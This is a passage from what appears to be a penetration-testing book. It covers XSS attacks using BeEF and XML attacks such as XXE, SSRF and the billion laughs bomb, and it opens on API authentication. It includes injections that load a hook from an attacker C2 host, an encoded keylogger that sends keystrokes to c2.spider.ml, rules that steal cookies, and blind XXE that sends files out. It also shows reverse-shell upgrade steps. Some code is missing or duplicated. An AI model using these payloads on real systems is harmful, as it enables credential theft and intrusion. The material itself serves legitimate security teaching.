to the document.head, which is to say we create a <script> tag in the
<head> tag of the page. The last line does just this, and the browser
immediately and silently downloads the hook code and executes it.
Again, the trailing x=" property is to make sure there are no HTML
parsing oddities and the code can execute cleanly.
<script>
sure = confirm("Hello [sink], are you sure you
wish to logout?");
if (sure) {
document.location = "/logout";
}
</script>
The prompt() function will return whatever string value we give it,
and alert() will concatenate the strings before returning to the user.
We can do all kinds of strange things like that with JavaScript, but
what's important to note is that a prompt() function was executed. If
we have control of what is concatenated in a string, we can execute
arbitrary JavaScript code.
<script>
sure = confirm("Hello " + eval("var hook =
document.createElement('script');hook.src='xxx.xxx
';document.head.append(hook);") + ", are you sure
you wish to logout?");
if (sure) {
document.location = "/logout";
}
</script>
We're not really concerned with the end result of the concatenation,
in fact, eval does not return anything meaningful for display. What
we care about is the execution of eval(), which will in turn execute
our hook dropper.
A keen eye will notice that there's a minor issue with this particular
injection. If the user clicks OK in the confirm dialog box, the sure
variable will be set to true and the page will navigate away, taking
down our BeEF hook with it.
The result is valid code that will prevent the if statement from
evaluating to true and changing the document location. We use the
double slash (//) to comment out the rest of the confirm() function,
preventing JavaScript parse errors:
<script>
sure = confirm("Hello "); eval("var hook =
document.createElement('script');hook.src='https:/
/c2.spider.ml/hook.js';document.head.append(hook);
"); sure = false; //, are you sure you wish to
logout?");
if (sure) {
document.location = "/logout";
}
</script>
Injecting JavaScript code in the middle of a function can present
some problems if it is not carefully crafted. HTML is fairly forgiving if
we miss a closing tag or break the rest of the page. Some JavaScript
engines, however, will fail to parse the code and our payload will
never execute.
For the following BeEF scenarios, we will hook the badguys site,
available at http://badguys.local, using the following XSS attack.
This is a much simpler reflected XSS attack, but it should do the trick
to showcase BeEF capabilities:
http://badguys.local/cross-site-scripting/form-
field?qs=">
<script+async+src=https://c2.spider.ml/hook.js>
</script><span+id="
If successful, the BeEF C2 server log will show the new hooked
browser, the IP address, the browser, the OS, and the domain on
which the XSS payload executed:
Note
Empire is an awesome C2 open-source software that allows full
control of Windows and Linux machines. The Windows agent is
written entirely in PowerShell and can be used to control every
aspect of the target. It is a very effective remote access trojan
(RAT). Linux is also supported via a Python agent. There are a
ton of post-exploitation modules and Empire is easily deployed in
the cloud. More information can be found
at https://www.powershellempire.com/.
Clicking Execute in the Fake Flash Update command will popup the
fake message in the victim's browser:
Figure 9.12: The Fake Flash Update command in action
Note
Hovering over the image will show the
http://c2.spider.ml/FlashUpdate.bat link that we configured
earlier in the Fake Flash Update command.
With a little help from the XSS attack, we were able to trick our victim
into executing our malware and letting us escalate privileges from in-
browser to having full control over the victim's machine.
The keylogger
A common use for XSS attacks is the old-fashioned keylogger.
JavaScript allows us to capture keystrokes very easily, and since we
have access to execute arbitrary JavaScript code in the browser, we
can set up a keystroke logger as well. You can imagine that XSS in a
login page could be very valuable to attackers.
We can see what looks like credentials typed into the hooked
application. The words will be split up because of the frequency with
which the BeEF hook calls home and submits the captured key
buffer. In most cases, it is fairly obvious what the user is typing in.
The built-in keylogger is fairly good and most attacks will benefit from
it. However, in certain situations, a more custom keylogger may be
required. Perhaps we want to send the keys to some other location,
or just want to record more keystrokes, such as Backspace, Enter,
and Tab.
When this event does fire, we store the pressed key inside a buffer
to be later submitted to the keylogging server. The if statement
within this keydown handler function will wrap special keys with
brackets to make it easier for us to read. For example: the
keystrokes Enter, Space, and Tab would be recorded as [Enter],
[Space], [Tab], respectively.
The last bit of code will execute a function every couple of seconds
(every 2,000 milliseconds) and is responsible for submitting the
current buffer to the defined push_url:
window.setInterval(function() {
if (buffer.length > 0) {
var data =
encodeURIComponent(btoa(buffer.join('')));
buffer = [];
}
}, 2000);
window.setInterval(function() {
if (buffer.length > 0) {
var data =
encodeURIComponent(btoa(buffer.join('')));
buffer = [];
}
}, 2000);
We can start the built-in PHP server on port 80 to serve the log.php
file for our JavaScript keylogger to communicate with:
All that's left is to push the JavaScript payload through BeEF to our
hooked target using the Raw JavaScript command under the Misc
node:
[Tab]administrator[Tab][Shift]Winter2018[Enter]
[Shift]Hi[ ][Shift]Jm[Backspace]im,[Enter][Enter]
[Shift]Please[ ]find[ ]attached[ ]the[ ]reports[
]from[ ]last[ ]quarter.[Enter][Enter]
There are no options to set for this one; we just have to execute and
everything is taken care of.
Automatic exploitation
All these modules are great, but XSS attacks are typically time-
sensitive. If we successfully trick the user into executing our BeEF
hook, we may not have enough time to click through the user
interface and run any modules before they close the page or browse
to some other part of the application.
Note
More information on ARE can be found at
https://github.com/beefproject/beef/wiki/Autorun-Rule-Engine.
BeEF comes with a few sample rules that allow you to execute
modules such as Get Cookie or Ping Sweep, but they are not turned
on by default. If we wish to execute them as soon as the victim is
hooked, we have to place the respective JSON files inside the
arerules/enabled subdirectory and restart BeEF.
The Get Cookie ARE rule looks like this:
root@spider-c2-1:~/beef# cat
arerules/get_cookie.json
{
"name": "Get Cookie",
"author": "@benichmt1",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_cookie",
"condition": null,
"options": {
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
There's some metadata, such as name and author. The ARE rule can
also specify any associated options it may need to execute
successfully. We can define an execution order and also add a delay.
The rule chaining modes refers to the method used to run the
module, but the default sequence should work just fine in most
deployments.
Note
More information on chaining modes and writing ARE can be
found at https://github.com/beefproject/beef/wiki/Autorun-Rule-
Engine.
root@spider-c2-1:~/beef# cp
arerules/man_in_the_browser.json
arerules/enabled/man_in_the_browser.json
root@spider-c2-1:~/beef# cp
arerules/get_cookie.json
arerules/enabled/get_cookie.json
For the ARE to load the newly enabled rules, we'd have to restart
BeEF if it is already running:
root@spider-c2-1:~/beef# ./beef
[...]
[18:07:19][*] RESTful API key:
cefce9633f9436202c1705908d508d31c7072374
[18:07:19][*] HTTP Proxy: http://127.0.0.1:6789
[18:07:19][*] [ARE] Ruleset (Perform Man-In-The-
Browser) parsed and stored successfully.
[18:07:19][*] [ARE] Ruleset (Get Cookie) parsed
and stored successfully.
[18:07:19][*] BeEF server started (press control+c
to stop)
BeEF will perform an MITB attack and extract the application cookies
as soon as the victim visits the infected page. The Man-In-The-
Browser module will keep the hook alive if the victim decides to click
around the application. The Get Cookie module will hopefully
exfiltrate session cookies in case they decide to close the browser
altogether.
As you may have guessed, we can also automatically run the Raw
Javascript module, which will allow us to execute arbitrary JavaScript
as soon as a hooked browser comes online. A good candidate for
this is our custom keylogger.
First, we have to create a rule that will instruct BeEF to execute the
raw_javascript module:
root@spider-c2-1:~/beef# cat
arerules/enabled/raw_javascript.json
{
"name": "Raw JavaScript",
"author": "[email protected]",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "raw_javascript",
"condition": null,
"options": {
"cmd": ""
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
The Raw JavaScript command input will look something like this:
eval(atob('dmFyIHB1c2hfdXJsID0gImh0dHA6Ly9jMi5zcGl
kZXIubWwvbG9nLnBocD9zZXNzaW9uPSI7Cgp2YXIgYnVmZmVyI
D0gW107CmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoImtleWR
vd24iLCBmdW5jdGlvbihlKSB7CiAgICBrZXkgPSBlLmtleTsKI
CAgIGlmIChrZXkubGVuZ3RoID4gMSB8fCBrZXkgPT0gIiAiKSB
7IGtleSA9ICJbIiArIGtleSArICJdIiB9CiAgICBidWZmZXIuc
HVzaChrZXkpOwp9KTsKCndpbmRvdy5zZXRJbnRlcnZhbChmdW5
jdGlvbigpIHsKICAgIGlmIChidWZmZXIubGVuZ3RoID4gMCkge
wogICAgICAgIHZhciBkYXRhID0gZW5jb2RlVVJJQ29tcG9uZW5
0KGJ0b2EoYnVmZmVyLmpvaW4oJycpKSk7CgogICAgICAgIHZhc
iBpbWcgPSBuZXcgSW1hZ2UoKTsKICAgICAgICBpbWcuc3JjID0
gcHVzaF91cmwgKyBkYXRhOwoKICAgICAgICBidWZmZXIgPSBbX
TsKICAgIH0KfSwgMjAwMCk7'));
Finally, we can add this value to our Raw JavaScript ARE rule JSON
file. This particular module expects a cmd option to be set, and this is
where we put our one-liner.
root@spider-c2-1:~/beef# cat
arerules/enabled/raw_javascript.json
{
"name": "Raw JavaScript",
"author": "[email protected]",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "raw_javascript",
"condition": null,
"options": {
"cmd":
"eval(atob('dmFyIHB1c2hfdXJsID0gImh0dHA6Ly9jMi5zcG
lkZXIubWwvbG9nLnBocD9zZXNzaW9uPSI7Cgp2YXIgYnVmZmVy
ID0gW107CmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoImtleW
Rvd24iLCBmdW5jdGlvbihlKSB7CiAgICBrZXkgPSBlLmtleTsK
ICAgIGlmIChrZXkubGVuZ3RoID4gMSB8fCBrZXkgPT0gIiAiKS
B7IGtleSA9ICJbIiArIGtleSArICJdIiB9CiAgICBidWZmZXIu
cHVzaChrZXkpOwp9KTsKCndpbmRvdy5zZXRJbnRlcnZhbChmdW
5jdGlvbigpIHsKICAgIGlmIChidWZmZXIubGVuZ3RoID4gMCkg
ewogICAgICAgIHZhciBkYXRhID0gZW5jb2RlVVJJQ29tcG9uZW
50KGJ0b2EoYnVmZmVyLmpvaW4oJycpKSk7CgogICAgICAgIHZh
ciBpbWcgPSBuZXcgSW1hZ2UoKTsKICAgICAgICBpbWcuc3JjID
0gcHVzaF91cmwgKyBkYXRhOwoKICAgICAgICBidWZmZXIgPSBb
XTsKICAgIH0KfSwgMjAwMCk7'));"
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
Each module will require its own specific options to run properly.
BeEF is an open-source software, so we can inspect the code to
figure out what these options are:
Figure 9.18: BeEF GitHub source code
Restarting BeEF will load our new ARE rule alongside the other two
canned rules:
root@spider-c2-1:~/beef# ./beef
[...]
[18:07:19][*] RESTful API key:
cefce9633f9436202c1705908d508d31c7072374
[18:07:19][*] HTTP Proxy: http://127.0.0.1:6789
[18:07:19][*] [ARE] Ruleset (Perform Man-In-The-
Browser) parsed and stored successfully.
[18:07:19][*] [ARE] Ruleset (Get Cookie) parsed
and stored successfully.
[18:07:19][*] [ARE] Ruleset (Raw JavaScript)
parsed and stored successfully.
[18:07:19][*] BeEF server started (press control+c
to stop)
All new hooked victims will have their cookies exfiltrated, a custom
keylogger executed, and persistence enabled via the MITB attack.
Tunneling traffic
Perhaps the coolest feature in BeEF is the ability to tunnel your
traffic through the hooked victim's browser. BeEF will set up a local
proxy that will forward web requests through the C2 and back out to
the victim.
root@spider-c2-1:~/beef# ./beef
[...]
[18:07:19][*] RESTful API key:
cefce9633f9436202c1705908d508d31c7072374
[18:07:19][*] HTTP Proxy: http://127.0.0.1:6789
We can see this traffic proxy in action by using curl and specifying
the default BeEF proxy service (127.0.0.1:6789) using the -x
parameter:
[...]
</html>
root@spider-c2-1:~#
Note
Remember that SOP applies when tunneling traffic as well. We
can send requests to arbitrary domains and ports, but we cannot
read the contents of the response:
root@spider-c2-1:~# curl -x 127.0.0.1:6789
http://example.com
ERROR: Cross Domain Request. The request was
sent howev
er it is impossible to view the response.
root@spider-c2-1:~#
Summary
In this chapter, we covered lots of information relating to client-side
attacks. We looked at the three more common types of XSS:
reflected, stored, and DOM, as well as CSRF, and chaining these
attacks together. We also covered the SOP and how it affects
loading third-party content or attack code onto the page.
The purpose of this chapter was to show that client-side attacks can
be practical in a real-world attack. Even though we are not executing
native code, XSS and CSRF attacks can be combined to do some
real damage to targets. In the next chapter, we will switch gears from
attacking users to attacking the server itself, by way of XML.
Chapter 10. Practical Server-
Side Attacks
In the previous chapter, we went through a series of practical attacks
against users, leveraging application vulnerabilities to achieve our
goal. The focus of this chapter will be server-side attacks, primarily
by exploiting XML vulnerabilities. Despite the fact that JSON has
gained a large market share of data exchange in web applications,
XML is still fairly prevalent. It's not as clean as JSON and can
be a bit harder to read, but it is mature. There are a ton of XML-
parsing libraries for any language a developer may choose to
complete a project with. Java is still popular in the enterprise world
and the Android phenomenon has only spawned more Java
enthusiasts. Microsoft is still very fond of XML and you'll find it all
over its operating system, in the application manifests, and in IIS
website configuration files.
The goal of this chapter is to get you comfortable with XML attacks
and, by the end, you will be familiar with:
DoS conditions
Server-Side Request Forgery (SSRF) attacks
Information leaks
Blind exploitation and out-of-band exfiltration of data
Remote code execution
On your travels, you no doubt have come across XML and, at first
glance, it looks similar to HTML. There's a header that describes the
document and it typically looks like this:
The <user> element indicates the type of record and its boundary is
</user>, much like HTML. This is also the root element. Within this
record, we have <name>, <id>, and <email> entries with the
appropriate values. It's important to note that any application that
parses this data must know what to do with the contents. Modern
web browsers know what to do with HTML's <div> and <a> because
they all follow a standard. Applications exchanging XML data must
agree on what that data is, and how it is processed or rendered. An
XML structure can be valid from a syntax point of view (that is, all the
tags are properly closed, there's a root element, and the document
header is present), but it may be missing expected elements and
applications may crash or waste resources attempting to parse the
data.
Internal DTDs can be found near the top of the XML document, in
the DOCTYPE tag:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ELEMENT user ANY>
<!ENTITY company "Ellingson Mineral Company">
]>
<user>
<name>Dade Murphy</name>
<id>1</id>
<email type="local">admin@localhost</email>
<company>&company;</company>
</user>
The preceding internal DTD defines the user root element and an
internal entity, company, which is defined to hold the string value
"Ellingson Mineral Company". Within the document itself, the
company entity can be referenced using the ampersand and
semicolon wrappers, which should look familiar if you have some
HTML experience. When the parser reaches the &company; string, it
will insert the value defined in the preceding DTD.
The user.dtd file will contain our entity and element definitions:
<!DOCTYPE user [
<!ELEMENT user ANY>
<!ENTITY company "Ellingson Mineral Company">
]>
The company entity will be expanded, as before, once the DTD is
successfully downloaded and parsed.
We can pass this XML document to a parser as part of, say, an API
authentication request. When it's time to resolve the &company; entity,
the parser will make an HTTP connection to config.ecorp.local and
the contents will be echoed in the <company> element.
A billion laughs
The billion laughs attack, also known as an XML bomb, is a DoS
attack that aims to overload the XML parser by causing it to allocate
more memory than it has available with a relatively small input buffer.
On older systems, or virtual machines with limited memory, a parser
bomb could quickly crash the application or even the host.
The XML bomb exploits the fact that file formats such as XML allow
the user to specify references or pointers to other arbitrarily defined
data. In the earlier examples, we used entity expansion to replace
&company; with data defined either in the header of the document or
somewhere externally.
A parser will look at this data and begin expanding the entities,
starting with the <lolz> root element. A reference to the &lol9; entity
will point to 10 other references defined by &lol8;. This is repeated
until the first entity, &lol;, expands to the "lol" string. The result is
the memory allocation of 10^9 (1,000,000,000) instances of the
"lol" string, or a billion lols. This alone can take up to 3 GB of
memory, depending on the parser and how it handles strings in
memory. On modern servers, the impact may be minimal, unless this
attack is distributed through multiple connections to the application.
Note
As always, take care when testing for these types of
vulnerabilities on client systems. DoS attacks are not usually
allowed during engagements. On rare occasions where DoS is
allowed, an XML bomb may be a good way to tie up resources in
the blue team while you focus on other parts of the network,
provided the system is not business-critical.
XML is not the only file format that allows for this type of DoS attack.
In fact, any language that has constructs for creating pointers to
other data can be abused in a similar fashion. YAML, a human-
readable file format typically used in configuration files, also allows
for pointers to data and thus the YAML bomb:
Request forgery
A request forgery attack occurs when an application is coerced into
making a request to another host or hosts of the attacker's choosing.
External entity expansion attacks are a form of SSRF, as they coerce
the application into connecting to arbitrary URLs in order to
download DTDs or other XML data.
Note
For the sake of this demo, our application will be accessible via
http://xml.parser.local.
Figure 10.4: Vulnerable PHP XML parser running
From the Burp menu, select the Burp Collaborator client option:
Figure 10.5: Starting the Burp Collaborator client module
gl50wfrstsbfymbxzdd454v2ut0jo8.burpcollaborator.ne
t
We will now build an XML document that fetches the publisher value
from the Burp Collaborator host we've just generated. We hope that
when the vulnerable application attempts to fetch the external
content, Burp Collaborator will be able to intercept the request and
confirm the vulnerability:
<?xml version="1.0" encoding="UTF-8"
standalone="yes"?>
<!DOCTYPE book [
<!ELEMENT book ANY >
<!ENTITY publisher SYSTEM
"http://gl50wfrstsbfymbxzdd454v2ut0jo8.burpcollabo
rator.net/publisher.xml">
]>
<book>
<title>The Flat Mars Society</title>
<publisher>&publisher;</publisher>
<author>Elon Musk</author>
</book>
Note
Collaborator is not required for this confirmation. We can use
a simple HTTP server running on our C2 server somewhere in
the cloud. Collaborator is useful when HTTPS is needed in a
rush, or if confirmation has to be done via DNS or some other
protocol.
We can see that the &publisher; entity was resolved by the parser,
which means the application made an external HTTP connection to
our Collaborator instance. It's interesting to note that the HTML
response was successfully interpreted as XML successfully by the
parser, due to the structure similarity of XML and HTML:
<html>
<body>[content]</body>
</html>
Polling the Collaborator server from the client confirms the existence
of this vulnerability and now we know we can influence the server in
some way:
Figure 10.8: Collaborator client confirms SSRF vulnerability
Since we are forging our request to come from the vulnerable XML
parser application, all port scan attempts will appear to come from an
internal trusted system. This is good from a stealth perspective, and
in some cases, can avoid triggering alarms.
The XML code we'll use for our XXE port scanner will target the
10.0.5.19 internal host, looking for interesting services: 8080, 80, 443,
22, and 21:
Once uploaded to the application for parsing, the payload will force
the XML parser into systematically connecting to each specified port,
in an attempt to fetch data for the &portN; entities:
Figure 10.9: XXE port scanner showing error messages for open ports
Burp Suite has a neat feature where it allows us to copy any request
captured as a curl command. If we wish to repeat this attack on
another internal host and perhaps parse the response for another
tool, we can quickly copy the payload with a single click:
The generated curl command can be piped to grep and we can filter
only lines containing "http:" to make reading the output a bit
cleaner:
Information leak
XXE can also be used to read any file on disk that the application
has access to. Of course, most of the time, the more valuable files
are the application's source code, which is a common target for
attackers. Remember that external entities are accessed using a
URL, and in PHP, the file system is accessible via the file:// URL
prefix.
The result is predictable and a good proof of concept for our report to
the client. The XML parser will reach out over the file:// scheme,
grab the contents of /etc/passwd, and display them no the screen:
Figure 10.11: Exploiting XXE to retrieve /etc/passwd
Local files are not the only thing we can touch with this exploit,
however. SSRF attacks, such as XXE, can also be used to target
internal applications that may not be accessible from an outside
network, such as other virtual local area networks (VLANs) or the
internet.
Note
The internal application running on 10.0.5.19 that we will use for
demonstration purposes is the awesome badguys project from
Mike Pirnat. The web application code can be downloaded from
https://github.com/mpirnat/lets-be-bad-guys.
http://10.0.5.19/user-pic?p=[LFI]
To grab this file's contents, our XML payload will look something like
this:
We can use the same LFI attack to grab its contents as well.
There is one problem with just changing the p path to the database
file:
http://10.0.5.19/user-pic?
p=../../../../../../db/badguys.sqlite3
In normal LFI situations, this will work just fine. We traverse enough
directories to reach the root of the drive, change directory to db, and
fetch the badguys.sqlite3 file.
SQLite 3's file format will contain characters that most XML parsers
will have a problem processing, and therefore parse errors may
prevent us from grabbing the contents.
To get around this issue, ideally, we want the XML parser to encode
the data it retrieves from the vulnerable internal application before it
injects it into the <xxe> tag for processing.
php://filter/convert.base64-encode/resource=[URL]
php://filter/convert.base64-
encode/resource=http://10.0.5.19/user-pic?
p=../../../../../../db/badguys.sqlite3
Figure 10.14: Repeating the attack using the PHP Base64 filter modification
We can now run the Base64 response through CyberChef with the
option of saving the decoded data to a file:
Figure 10.15: SQL database extracted from an internal host
Note
CyberChef is a great tool for data manipulation, available online
or for download from GCHQ at https://gchq.github.io/CyberChef/.
Blind XXE
As you have probably witnessed in your day-to-day role, not all XML
parsers are as verbose as the preceding example. Many web
applications are configured to suppress errors and warnings, and
sometimes will not echo any useful data back to you. The preceding
attacks relied on the fact that the payload was processed and the
entities were echoed out to the screen. This allowed us to exfiltrate
the data easily.
Figure 10.16: The modified PHP XML parser does not return data
What if, instead of instructing the XML parser to return the data we
need with the <xxe>&exfil;</xxe> tag, we take an out-of-band
approach? Since we cannot return data in the browser, we can ask
the parser to connect to a C2 server and append the data to the
URL. This will allow us to retrieve the contents by analyzing the
C2 server's access logs.
A keen eye will notice the new percent character preceding the entity
names. This denotes a parameter entity as opposed to a general
entity, as we've used so far. General entities can be referenced
somewhere in the root element tree, while parameter entities can be
referenced in the DTD or the header of the document:
The next step is to try these two entities in our previous payload:
As you can see, we are defining the %data and %conn parameter
entities in our DOCTYPE. The %conn entity also defines a general entity,
&exfil, which will attach the Base64-encoded %data entity to our C2
URL for exfiltration.
Simply put, the vulnerable XML parser will perform the following:
We can check our payload for errors locally using the xmllint Linux
command, as shown:
^
payload.xml:5: parser warning : not validating
will not read content for PE entity data
<!ENTITY % conn "<!ENTITY exfil SYSTEM
'http://c2.spider.ml/exfil?%data;'>">
^
payload.xml:6: parser error : PEReference: %conn;
not found
%conn;
^
payload.xml:8: parser error : Entity 'exfil' not
defined
<xxe>&exfil;</xxe>
^
Note
xmllintis available in the libxml2-utils package on Debian-
based distributions, such as Kali.
The workaround is easy enough. We will store the entity declarations
for %data and %conn on our C2 server in an external DTD file:
The only real difference here is that we moved our two parameter
entity declarations into an external DTD and we are now referencing
it in our XML DOCTYPE.
As expected, our XML data did not generate any errors and it did not
return any data either. We are flying blind:
Figure 10.18: The modified XML exploit code
The first request comes in for the payload.dtd file; this means we
have confirmed the XXE vulnerability. The contents are processed
and the subsequent call to the exfil URL containing our data shows
up in the logs almost immediately.
Once parsed, the <xxe> tag would contain the contents of the
/etc/passwd file. Asking PHP to execute code is not much more
difficult thanks to PHP's expect module. Although not typically
deployed by default, the expect extension provides PHP applications
with an expect:// wrapper, allowing developers to execute shell
commands through a URL-like syntax.
Much like the file:// wrapper, expect:// provides read and write
access to the PTY stream, as opposed to the filesystem. Developers
can use the fopen function with an expect:// wrapper to execute
commands and retrieve their output:
<?php
$stream = fopen("expect://ssh root@remotehost
uptime", "r");
?>
Once completed, the result can be used in the rest of the application.
When attacking XML, we don't need to execute PHP code and call
the fopen function. The expect:// wrapper is readily available to XML
parsers.
There are a few steps we need to take, which some may call magic,
in order to upgrade our shell. First, we can call python to spawn a
new TTY bash shell. Although not perfect, it's better than what we
had before:
The one-liner may look strange if you're not familiar with Python, but
all it really does is import the pty package and spawn a bash shell.
In our reverse shell, we execute the python command and the result
should look familiar:
There are some issues with this still: while Vim will work, there's no
access to history, or Tab completion, and Ctrl-C will terminate the
shell.
Let's go a step further and try to upgrade to a full TTY using stty and
the local terminal configuration.
First, once the shell is upgraded using the preceding Python one-
liner, we have to send the process to the background using Ctrl-Z:
Note
Our C2 server is running in a screen session, but you can expect
to see xterm-256color or Linux on a typical Kali installation.
Now, we need the configured rows and columns for the terminal
display. To get these values, we use the stty program with the -a
option:
root@spider-c2-1:~# stty -a
speed 38400 baud; rows 43; columns 142; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof =
^D; eol = <undef>; eol2 = <undef>; swtch =
[...]
The next command may seem as though it breaks the terminal, but
in order to prevent Ctrl-C from killing our shell, we have to turn the
TTY to raw and disable the echo of each character. The commands
we input in our shell will still be processed, but the terminal itself,
without a reverse shell active, may look broken.
We tell stty to set the terminal to raw and disable echo with -echo:
Returning from the background, you will see the reverse shell
command echoed back to the screen: nc -lvp 443, and everything
may look a bit broken again. No problem– we can type reset to
clean it up.
Inside the reverse shell, now that everything looks good again, we
also need to set the same terminal options, including rows, columns,
and type, in order for the shell to work properly:
The result is a fully working terminal with all the fancy features, and
yes, we can even run screen in our netcat reverse shell:
It's not all rainbows with this type of approach, however. New
security challenges are introduced with this model. Decoupled
services mean a larger attack surface with multiple instances, be
they virtual machines or Docker containers. More components
usually equate to a greater chance of misconfiguration, which can, of
course, be taken advantage of by us.
Authentication and authorization enforcement between components
is a new problem to solve as well. If my monolithic application has
every component built in, I don't really need to worry about securely
communicating with the authentication module, as it resides on the
same server, and sometimes in the same process. If my
authentication module was decoupled and it is now an HTTP web
service running in the cloud, I have to consider the network
communication between my user interface and the authentication
module instance in the cloud. How does the API authenticate my
user interface? How can the two components securely negotiate an
authentication response so that the user is allowed access to the
other components?
There are certainly other types of protocols that APIs can use, but
while their protocols differ, the majority of the same security
challenges remain. The most popular protocols are RESTful APIs,
followed by SOAP APIs.
SOAP
SOAP was developed by Microsoft because Distributed
Component Object Model (DCOM) is a binary protocol, which
makes communication over the internet a bit more complicated.
SOAP leverages XML instead, a more structured and human-
readable language, to exchange messages between the client and
the server.
Note
SOAP is standardized and is available for review in its entirety
at https://www.w3.org/TR/soap12/.
<?xml version="1.0"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-
envelope/"
soap:encodingStyle="http://www.w3.org/2003/05/soap
-encoding">
<soap:Body xmlns:m="http://internal.api/users">
<m:GetUserRequest>
<m:Name>Administrator</m:Name>
</m:GetUserRequest>
</soap:Body>
</soap:Envelope>
The response from the server, as you would expect, is also XML-
formatted:
HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
<?xml version="1.0"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-
envelope/"
soap:encodingStyle="http://www.w3.org/2003/05/soap
-encoding">
<soap:Body xmlns:m="http://internal.api/users">
<m:GetUserResponse>
<m:FullName>Dade Murphy</m:FullName>
<m:Email>[email protected]</m:Email>
<m:IsAdmin>True</m:IsAdmin>
</m:GetUserResponse>
</soap:Body>
</soap:Envelope>
While the Envelope, Body, and Header tags are standardized, the
contents of the body can vary depending on the request type, the
application, and the web service implementation itself. The
GetUserRequest action and its Name parameter are specific to the
/UserData endpoint. To look for potential vulnerabilities, we need
to know all the possible endpoints and their respective actions or
parameters. How can we grab this information in a black-box
scenario?
The last resort is, obviously, just observing the web, mobile, or native
applications interacting with the API, capturing the HTTP traffic in
Burp, and replaying it through the Intruder or Scanner modules. This
is certainly not ideal, as vulnerable parameters or actions may never
be called under normal application operation. When the scope
allows, it's always best to get the WSDL straight from the developer.
REST
REST is the dominant architectural style you will likely encounter in
modern applications. It is simple to implement and easy to read, and
therefore widely adopted by developers. While not as mature as
SOAP, it does provide a simple way to achieve decoupled design
with microservices.
Much like SOAP, RESTful APIs operate over HTTP and they make
heavy use of the protocol verbs, including but not limited to:
GET
POST
PUT
DELETE
HTTP/1.0 200 OK
Server: WSGIServer/0.1 Python/2.7.11
Content-Type: text/json
A 200 HTTP response indicates that it was successful, our token was
valid, and we now have a JSON object with all the details concerning
the admin user.
RESTful APIs typically use JSON for requests and responses, but
there is no hard standard and developers may choose to use a
custom XML protocol or even raw binary. This is unusual, as
microservices interoperability and maintenance becomes difficult, but
it is not unheard of.
API authentication
Decoupling brings about a few more challenges when it comes to
authentication and authorization. It's not uncommon to have an API
that does not require authentication, but the chances are some web
services you'll encounter will require their clients to authenticate in
one way or another.
APIs are similar in that they require some sort of secret key or token
to be passed back with each request that requires authentication.
This token is usually generated by the API and given to the user
after successfully authenticating via other means. While a typical
web application will almost always use the Cookie header to track the
session, APIs have a few options.
Basic authentication
Yes, this is also common in web applications but is generally not
used in modern applications, due to security concerns. Basic
authentication will pass the username and password in cleartext via
the Authorization header:
The obvious issues with this are that the credentials are flying over
the wire in cleartext and attackers only need to capture one request
to compromise the user. Session IDs and tokens will still provide
attackers with access, but they can expire and can be blacklisted.
API keys
A more common way to authenticate is by supplying a key or token
with our API request. The key is unique to the account with access to
the web service and should be kept secret, much like a password.
Unlike a password, however, it is not (usually) generated by the user
and thus is less likely to be reused in other applications. There's no
industry standard on how to pass this value to APIs, although Open
Authorization (OAuth) and SOAP have some requirements defined
by the protocol. Custom headers, the Cookie header, and even
through a GET parameter are some of the common ways tokens or
keys are sent along with the request.
Using a GET URL parameter to pass the key is generally a bad idea
because this value can be cached by browsers, proxies, and web
server log files:
GET /users?
name=admin&api_key=aG93IGFib3V0IGEgbmljZSBnYW1lIG9
mIGNoZXNz HTTP/1.1
Host: api.ecorp.local:8081
Content-Type: application/json
Accept: application/json
Cache-Control: no-cache
Another option is using a custom header to send the API key with
the request. This is a slightly better alternative but still requires
secrecy through HTTPS to prevent MITM attacks from capturing this
value:
Bearer authentication
Similar to keys, bearer tokens are secret values that are usually
passed via the Authorization HTTP header as well, but instead of
using the Basic type, we use the Bearer type. For REST APIs, as
long as the client and server agree on how to exchange this token,
there is no standard defining this process and therefore you may see
slight variations of this in the wild:
JWTs
JWTs are a relatively new authentication mechanism that is gaining
market share with web services. They are a compact, self-contained
method of passing information securely between two parties.
Note
OAuth information can be found at https://oauth.net/2/.
JWTs are essentially claims that have been signed using either
hash-based message authentication code (HMAC) and a secret
key, or with an RSA key pair. HMAC is an algorithm that can be used
to verify both the data integrity and the authentication of a message,
which works well for JWTs. JWTs are a combination of a base64url
encoded header, payload, and the corresponding signature:
base64url(header) . base64url(payload) .
base64url(signature)
The header of the token will specify the algorithm used for signing
and the payload will be the claim (for example, I am user1 and I am
an administrator), while the third chunk will be the signature itself.
If we inspect the preceding bearer token, we can see the make-up of
a typical JWT. There are three chunks of information separated by a
period, encoded using URL-safe Base64.
Note
URL-safe Base64-encoded uses the same alphabet as traditional
